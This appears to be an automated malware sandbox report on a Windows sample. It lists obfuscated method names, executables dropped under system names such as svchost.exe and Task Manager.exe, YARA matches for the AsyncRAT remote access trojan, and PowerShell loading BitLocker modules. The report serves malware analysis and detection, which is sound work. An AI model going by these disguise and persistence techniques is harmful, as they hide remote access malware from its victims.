                        Source: Task Manager.exe.2.dr, N4qv0P7NqA5lLmrpfCCEcg1bUhKkgDxW8ewFoS8VR7VFHhwHxHJH30V8zwyd8nWLVrg2.csHigh entropy of concatenated method names: 'DoMJLrELpQF4kFNB0F2SzJ1FaHYAi6IrR5456rZ4BPQoYNepejTjw2zju9TGoGvUJ2Wa', 'YfKbxaacUyLm8kXroJQdpZ1F24wHvAN04faspdjbxGd374vXpOFIgnZQurKjV0QRTpln', 'NwvuBUlOOBocUbQj0QMiCKKTMAakL5m4h1Pmt7YfMHNuZKLlaY1iVt6TcPRaj3Ji2NOz', 'DGGBKWl4dTZEx5CiDVdFVD7CVjAgP074v8B0arH0wBJ9flQwhWK4bUZLRGpe0HJ941DJ', 'txv5K3hULC9xdl1tqKArHalMJPZS2ozVn5zMo21GUCdewvcEF03GEslXIv5b1kaTrqDL', 'Nm6ZEDurG88dfYm8KN5FW0FYqapgoO3ItRqJtSdntWUVcpzItNabV9UxNmHeMgx0ml7t', 'rDpxrqsuziO8bnUQkFVb2MJFwF6zIeNItjm3DnHSuOXvvIRBsRwKhEBZKum02HIaUX1E', 'zazUa0bRl6zjQ5YI9hAwE2ZO0RaHKsVNaU6Fsj4gz7Xfpxeru5TVYLZuQKkgEAoQxxIQ', 'dFsvjRDCYGISAmhuipQSXU0Zg7jMzL7YDwKY9vqN1l1icXi00PrHCQnk3Lt9S4RpvmRC', 'E4xcB5DlPKy'
                        Source: Task Manager.exe.2.dr, 2syffmJ1FUx.csHigh entropy of concatenated method names: 'RCgI0QPFSdl', 'rpSmmtLxQYb', 'koLYQu9EV1S', 'T62a3hNbfsL', '_6fH79MZnGpY', '_9iq9wD0Tf7f', 'CaFVmdLghdY', 'gA6uv1tr8t0', 'tQHrqPhYyD7', 'HIw61xlgmjQ'
                        Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.csHigh entropy of concatenated method names: 'oGKOL3iQ4xp', 'bo83QMMPxOG', 'XORqQdkcJon', 'AJmeDY4PP6q', '_756IyhxiumA', 'mXN9y5ZR179', 'cXg73EliikJ', 'kPjOwnT9Boq', 'ZnIfdmtxVY5', 'EIzDG51TZUR'
                        Source: Task Manager.exe.2.dr, vGttXPsprPl.csHigh entropy of concatenated method names: 'R4QXIaZ2ndo', 'znWLPNKRCJq', '_3QQ8Uy8irTD', 'gU7f7uOpv2C', 'q3wcOQu4bDWK1VT79IJ4rmrnKzJkvbMfTvf02jIt7cK6Lcymm7yZuOj734GM', 'aHLFcJ9ls4nA5iMBvgrqa1GU0Gza7qz2PoismJa7Umc7E4LOLH5ViDcFSuGb', 'ASyMXup4lSaDRSAmgY1mJb7zfm41let6mYBnU6wvB80SWuztpSnmEVJd0xrd', 'Dam22eNwJ5cMO2u9PdB5pJRy6K4b13gaukpjGqNIidlOf9eZkZs5Bslgh3es', 'o8hcspxHqsSgU0EZIM4hQTqsUXxxeeb45VA3yY4uerWRg5mK4yh6qH8IgEby', 'rraPFaDnOL7v16gHHKPocJa55M87TSUmM6QAjiYzlugYSq'
                        Source: Task Manager.exe.2.dr, 775FRTYl17K.csHigh entropy of concatenated method names: 'tNkLUOUXFRI', 'RzlrCku5r1kvGldkvVcJjNqQHdkswbAW711i7fTVBlvkuJ', '_8ndIQtd49Q02IkEktJdSlAXm8a94rgVQeZBkPQ54r6Yis0', 'M6OYZvHBMRn1748kJi4vmK1yn3GsiEmE2fe0GrB2mhJdIE', 'rTxgQw0Kd3agGxctM1GlZeg51QYCZEpIz2FzY6fC5yHwo2'
                        Source: Task Manager.exe.2.dr, bFPtK0txY2P.csHigh entropy of concatenated method names: 'vDhoLRx1yBB', 'PJzNRzn04zALdsQD2LL42Dh6edVq', 'jqKisptso54xa0FP31udMcbjJl3OKl7tKyQJbkpcRzq6llDIl3JjNQP3PRqi', 'y5ItxXCmB4OIwUGCpO8IVuxF8MUVq6G44qNTJpTnuZEFqo1QzGzx3XEbKNOr', 'gz0CJ1jHfufWHBoP2NzuAcyvefbh2VzVxflMfB2mufvIkHSBylONcET4uxrd'
                        Source: Task Manager.exe.2.dr, xOmJpehc6ZQ.csHigh entropy of concatenated method names: 'gsxDanNrMHb', 'rWcTSiKeMZI', 'bwQt3hA2Q4y', 'UMICaIhERl1', 'htV76t8gnUV', 'Kj93YdEXAtd', 'BoopK1ISvq2', '_03nazhDhW2Q', 'HN2Tu8HK1Nb', '_5WBJwHLxizi'

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with benign system names
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\All function.cmdFile created: C:\Users\user\AppData\Roaming\Task Manager.exeJump to dropped file
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeFile created: C:\Users\user\AppData\Roaming\All function.cmdJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\All function.exeFile created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\All function.cmdFile created: C:\Users\user\AppData\Roaming\All function.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\All function.exeFile created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeJump to dropped file
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeFile created: C:\Users\user\AppData\Roaming\All function.cmdJump to dropped file

                        Boot Survival

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
